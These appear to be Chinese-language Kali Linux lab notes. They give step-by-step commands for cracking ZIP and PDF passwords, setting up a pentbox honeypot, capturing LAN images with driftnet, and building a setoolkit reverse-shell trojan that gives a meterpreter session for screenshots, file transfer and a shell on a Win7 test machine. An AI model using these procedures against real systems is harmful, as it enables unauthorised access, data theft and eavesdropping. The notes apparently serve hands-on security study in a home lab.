密码破解
-
zip破解
zip2jonh xxx.zip > hash.txt john hash.txt
-
pdf文件密码破解
-
在wps中创建pdf,并设置密码输出
密码要简单6-8位的纯数字
-
把pdf文件用kali的root用户终端打开
-
apt install pdfcrrack #下载安装pdf破解工具
-
制作密码字典
-
touch miamzidian.txt #创建 vim mimazidian.txt #编辑
-
编辑是常用的密码组合全写上包括你的pdf密码,并保存退出
wq!
-
pdfcrack -w mimazhidian.txt 1.pdf #参数 -w 密码字典 pdf文件
-
-
蜜罐
- 下载pentbox,解压并打开
wget https://jaist.dl.sourceforge.net/project/pentbox18realised/pentbox-1.8.tar.gz #下载pentbox
tar -xvf pentbox-1.8.tar.gz #解压
cd pentbox-1.8 #切换目录
ruby pentbox.rb #启动pentbox
-
用pentbox创建蜜罐
---->2
----->3
自动搭建 ------>1 或 手动搭建 ----->2
手动搭建: -->8080 -->q -->y -->回车 -->y
效果
局域网图片劫持
桌面上创建放照片的文件夹
cd /home/kali/Desktop
mkdir tupian
kali进入root用户终端
driftnet #安装
driftnet -i eth0 -a -d #开始抓取照片并保存到桌面上的文件夹
打开win7,随便搜索图片,回到kali会保存到桌面上的文件夹里
局域网密码探测
windows木马测试
-
进入kali终端root,输入setoolkit 打开该工具(制作木马)
输入 —>1 —>4 —>2
输入 —>kali 的 ip地址
输入端口号 —>5555
—>yes 回撤
-
复制木马文件到桌面
cp /root/.set/payload.exe /home/kali/Desktop/xxx.exe
-
把木马拷贝到 win7 上,并调隐藏的后缀,运行
计算机–工具–文件夹选择–查看–取消隐藏已知文件夹类型的扩展名
点击木马exe文件,以管理员的身份运行
-
回到 kali 实现 捕获截图,上传,下载,得到shell
-
输入 sessions (会显示 win7 主机名和 IP 地址)
-
输入 sessions -i 1 (得到 meterpret 命令行模式)
-
输入 screenshot (捕获 win7 界面截图)
-
上传
upload /home/kali/Desktop/kali.txt C:/Users/abu/Desktop
-
下载
download C:/Users/abu/Desktop/wondows.txt /home/kali/Desktop
-
得到shell
输入 shell
输入 chcp 65001 #解决乱码问题(但是没有完全解决)
-